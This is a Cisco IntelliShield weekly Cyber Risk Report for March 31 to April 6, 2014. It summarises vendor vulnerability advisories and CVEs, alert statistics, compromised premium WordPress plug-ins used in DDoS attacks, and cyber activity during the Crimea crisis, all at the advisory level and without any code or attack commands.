Products & Services
Support

Product Categories


Popular Downloads


Manage Software

How to Buy

For Home

Linksys Products Store
Linksys is now part of Belkin
Products for everyone

All Ordering Options

Training & Events Partners
Guest

Cyber Risk Report

Cyber Risk Report: March 31-April 6, 2014

 
Threat Type:IntelliShield: Cyber Risk Report
IntelliShield ID:33677
Version:1
First Published:2014 April 07 19:03 GMT
Last Published:2014 April 07 19:03 GMT
Port: Not available
Urgency:Weakness Found
Credibility:Confirmed
Severity:Mild Damage
 
 
Version Summary:This is the Cyber Risk Report for March 31-April 6, 2014. The report details the significant events for this time period and covers multiple threat and risk management categories.
 

Description
 

Contents

Vulnerability
Attacks and Compromises
Geopolitical
Upcoming Security Activity
Additional Information

Listen to the Podcast (7:13 min)

Vulnerability

Vulnerability activity for the period declined from previous periods, although the monthly total for March 2014 shows a continued increase in vulnerability activity. Highlights for this period include a large update for Apple Safari, Adobe Reader and Flash Player vulnerabilities, and a new vulnerability in UNIX CUPS.

The vulnerability metrics for the first quarter of 2014 show the consistent increase not only in total vulnerabilities, but also in new vulnerabilities. Researchers, governments, and vendors are increasingly competing and paying for the identification of new vulnerabilities, further fueling the increasing activity levels. The growing movement of incorporating secure development lifecycle practices in developing and maintaining software has also contributed to the identification and correction of more vulnerabilities. These two factors are contributing to the increasing levels of vulnerability activity and increasing the load on system operators and owners to keep their systems updated. The industry has responded with an increasing number of automated scanning, monitoring and updating products to assist owners and operators, particularly those who operate the increasingly common virtual environments. Organizations that operate large environments should strongly consider investing in one of these products to assist and automate their system maintenance and management.

Apple released a large update for the Safari browser to correct 16 vulnerabilities. Researchers reported multiple vulnerabilities in Adobe Reader and Flash Player. Adobe has not confirmed these vulnerabilities and has not released updated software. The Common UNIX Printing System contains a vulnerability that could allow a unauthenticated, remote attacker to execute arbitrary code on a targeted system. This vulnerability has also not been confirmed by the developers and software updates are not available. Additional vulnerabilities and software updates were reported for JBoss, OpenStack, Wireshark, and RSA Adaptive Authentication.

Cisco released the following Security Notices, available at Cisco Security Advisories, Responses, and Notices:
  • Cisco Unity Connection Directory Traversal Vulnerability
  • Cisco IOS XR Software ICMPv6 Redirect Vulnerability
  • Cisco Emergency Responder Dynamic Content Modification Vulnerability
  • Cisco IOS Software IKE Main Mode Vulnerability
  • Cisco Emergency Responder Cross-Site Scripting Vulnerability
  • Cisco Emergency Responder Cross-Site Request Forgery Vulnerability
  • Cisco Emergency Responder Open Redirect Vulnerability
  • Cisco WSA HTTP Header Injection Vulnerability
  • Cisco Security Manager HTTP Header Redirection Vulnerability
  • Cisco Unity Connection Cross-Site Scripting Vulnerability 

Microsoft announced it will release four security bulletins for the April 2014 release, including the last regular updates for Windows XP and vulnerabilities in Internet Explorer. With the final support and security updates for Windows XP, the U.S. Department of Homeland Security (DHS) released a warning that criminals and scams are likely to further exploit users with increased email spam and fake support cold calls to access and control these systems.

In ICS/SCADA activity, Schneider Electric reported vulnerabilities in its SCADA drivers. Researchers continue to increase their focus on these SCADA system vulnerabilities and are more actively developing exploits for these vulnerabilities.

IntelliShield published 141 events last week: 86 new events and 55 updated events. Of the 141 events, 44 were Vulnerability Alerts, 13 were Security Activity Bulletins, two were Security Issue Alerts, 81 were Threat Outbreak Alerts, and one was a Cyber Risk Report. The alert publication totals are as follows:

Day Date
New
Updated
Total
Saturday 04/05/2014
     1

        2

     3
Friday 04/04/2014
   13

      14

   27
Thursday 04/03/2014
   15

        6

   21
Wednesday 04/02/2014
   16

      11

   27
Tuesday 04/01/2014
   17

      13

   30
Monday 03/31/2014
   24

        9

   33
 
Month New
Updated
Total
January  349
    188
 537
February  442
    180
 622
March  447
    251
 698
Totals 1238
    619
1857
 

Previous Alerts That Still Represent Significant Risk

Microsoft Office Word RTF File Processing Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 33490, Version 1, March 24, 2014
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2014-1761
Microsoft Office Word contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Microsoft reports that limited attacks that use this vulnerability have occurred in the wild. Microsoft has released a security advisory; however, software updates are not available.

Microsoft Internet Explorer Memory Corruption Vulnerability
IntelliShield Vulnerability Alert 33126, Version 3, April 7, 2014
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2014-0307
Microsoft Internet Explorer contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code. Functional code that exploits this vulnerability is available as part of the Metasploit framework. Microsoft has confirmed the vulnerability in a security bulletin and released software updates.

Microsoft Internet Explorer Use-After-Free Vulnerability 
IntelliShield Vulnerability Alert 32870, Version 3, March 11, 2014
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2014-0322
Microsoft Internet Explorer contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Exploits observed in the wild target Internet Explorer 10 with Adobe Flash. Reports also indicate that installing Microsoft’s Experience Mitigation Toolkit (EMET) or updating to Internet Explorer 11 prevents the exploit. Microsoft has confirmed the vulnerability in a security bulletin and released software updates.

Apple iOS Updates for March 2014
IntelliShield Activity Bulletin 33265, Version 1, March 11, 2014
Urgency/Credibility/Severity Rating: 2/5/4
Multiple CVE's
Apple iOS contains multiple vulnerabilities that could allow unauthenticated, remote or local attackers to conduct multiple attacks. Apple iOS versions prior to 7.1 for iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later devices are vulnerable. Updates are available.

Apple OS X Mavericks Security Updates for February 2014
IntelliShield Security Activity Bulletin 33051, Version 1, February 25, 2014
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2014-1245, CVE-2014-1246, CVE-2014-1247, CVE-2014-1248, CVE-2014-1249, CVE-2014-1250, CVE-2014-1254, CVE-2014-1255, CVE-2014-1256, CVE-2014-1257, CVE-2014-1258, CVE-2014-1259, CVE-2014-1260, CVE-2014-1261, CVE-2014-1262, CVE-2014-1263, CVE-2014-1265
Apple has released a security and feature update to correct multiple vulnerabilities in Apple Mac OS X 10.9.1, and security updates for Mountain Lion 10.8.5 and Lion 10.7.5. 

Attacks and Compromises

WordPress Plug-ins Used in Distributed Denial of Service Attacks

Researchers reported identification of multiple plug-ins, particularly premium plug-ins, that are being used to compromise WordPress systems and use them in distributed denial of service (DDoS) attacks. The researchers highlighted that while the risk of free plug-ins is well known, multiple premium plug-ins that users must pay for have also been compromised and used to infect systems. The infected systems notify the attackers, who will then download additional exploits to the systems. Malicious sites have also been identified that offer these premium plug-ins at lower costs, tempting the system owners to download the malicious plug-ins.
Hijacking WordPress Websites with Free Premium Plugins
Unmasking "Free" Premium WordPress Plugins

Analysis: WordPress systems continue to be targeted through known vulnerabilities on systems that have not been maintained and through a multitude of plug-in vulnerabilities that allow attackers access and control of the system. This trend was identified last year as attackers shifted to compromising web servers to gain the increased processing power and bandwidth of those systems, compared to end-user systems. This latest research shows a new attack method using often more trusted premium plug-ins. The system owners may place more trust in these systems because they are paying for them, even if they are obtaining the premium plug-in at a reduced price. As the attacks and compromises on WordPress systems continue, hosting and service providers may need to become involved to regain control of these infected systems that may have been abandoned or are not actively being maintained.

Geopolitical

Evolution of Cyber in Military Action

As the world watches Russian troops amassing along Ukraine's eastern border, reports are surfacing about communications disruptions, website defacements, and sophisticated malware that accompanied the military action. According to NATO Commander General Philip Breedlove, when Russian troops annexed Crimea in March, they cut telephone cables and jammed communications, disconnecting the Ukrainian troops in Crimea from their command and control. During the protests in Kiev, some protesters received ominous text messages on their phones that read, "Dear Subscriber, You are registered as a participant in a mass disturbance." Further, sophisticated malware known as Ouroboros, or Snake, which has plagued Ukrainian government systems for years and steals information, has been increasingly active in recent weeks.
A Cyber History of the Ukraine Conflict 
Why Ukraine Hasn't Sparked a Big Cyberwar 
NATO Commander Sees Potent Threat from Russia
Suspicion Falls on Russia for Snake Cyberattacks 

Analysis: Information security specialists are watching closely the cyber component of the current situation in Ukraine. They are measuring it against other recent regional conflicts, in which network outages, website defacements, or other cyber activity occurred in tandem with military conflict (Georgia in 2010) or political incident (Estonia in 2007). Unlike the military invasion of Georgia’s South Ossetia region in 2010, for example, the annexation of Crimea was not accompanied by a complete Internet blackout, and most outages were confined to the Crimea area. Media reporting also indicates that the Crimea outages may have been caused by physical disruption (cutting of wires upon entry into service provider Ukrtelecom offices) rather than electronic means. However, if Western media reporting is accurate, it can be concluded that no other regional conflict has combined as many different kinds of cyber attacks all within a period of a few weeks--from website defacements to malware and outages. While no single attack has done decisive damage and no one actor or group of actors can be positively identified, taken together, these attacks have been an effective complement to the military action.

Upcoming Security Activity

Infosec World: April 5-11, 2014
GovSec (U.S.): May 13-14, 2014
Cisco Live 2014: May 18-22, 2014
FIRST Conference: June 22-27, 2014
Black Hat USA: August 2-7, 2014
DEF CON 22: August 7-10, 2014
(ISC)2 Security Congress/ASIS 2014: September 29- October 2, 2014

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following:

U.S. NCAA Men's Basketball Tournament: March 16-April 7, 2014
ITU 6th World Telecom Development Conference: March 31-April 11, 2014
2014 FIFA World Cup Brazil: June 12-July 13, 2014
India National Elections: April 7-May 12, 2014

Additional Information

For information and commentary from the experts in Cisco Security, please visit the Cisco Security Blog.

For timely information from across Cisco Security, please consider following @CiscoSecurity on Twitter.

 
Alert History
 
Initial Release


Product Sets
 
The security vulnerability applies to the following combinations of products.

Primary Products:
IntelliShieldCyber Risk Report Original ReleaseBase

Associated Products:
N/A



LEGAL DISCLAIMER
The urgency and severity ratings of this alert are not tailored to individual users; users may value alerts differently based upon their network configurations and circumstances. THE ALERT, AND INFORMATION CONTAINED THEREIN, ARE PROVIDED ON AN "AS IS" BASIS AND DO NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE ALERT, AND INFORMATION CONTAINED THEREIN, OR MATERIALS LINKED FROM THE ALERT, IS AT YOUR OWN RISK. INFORMATION IN THIS ALERT AND ANY RELATED COMMUNICATIONS IS BASED ON OUR KNOWLEDGE AT THE TIME OF PUBLICATION AND IS SUBJECT TO CHANGE WITHOUT NOTICE. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME.
Powered by  IntelliShield